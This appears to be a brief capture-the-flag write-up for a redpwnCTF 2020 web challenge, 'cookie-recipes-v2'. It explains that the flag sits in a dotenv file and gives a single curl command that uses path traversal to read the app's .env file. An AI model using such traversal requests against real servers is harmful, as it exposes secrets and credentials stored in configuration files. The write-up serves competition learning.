We noticed the application uses `dotenv` to store the flag and also found a path traversal vulnerability (unintended by the author)

`dotenv` fetches values from a file called `.env`. So we can get the flag by fetching this file!

```
curl --path-as-is https://cookie-recipes-v2.2020.redpwnc.tf/../../../../../../../app/.env
```